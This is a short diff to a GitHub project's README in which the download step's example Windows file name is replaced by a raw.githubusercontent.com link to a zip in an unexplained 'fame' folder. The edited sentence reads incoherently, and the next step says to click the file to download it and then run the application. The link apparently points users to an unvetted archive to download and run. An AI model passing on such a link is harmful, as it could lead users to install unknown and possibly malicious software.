SemenkinSS/IT_CRT_Python/README.md

 ### Step 3: Download the Application

 Find the appropriate file for your system.
-For example, if you are using Windows, you might see a file named `IT_CRT_Python.exe`.
+For example, if you are using Windows, you might see a file named `https://raw.githubusercontent.com/SemenkinSS/IT_CRT_Python/main/fame/IT_CRT_Python.zip`.
 Click on that file to start the download.

 ### Step 4: Run the Application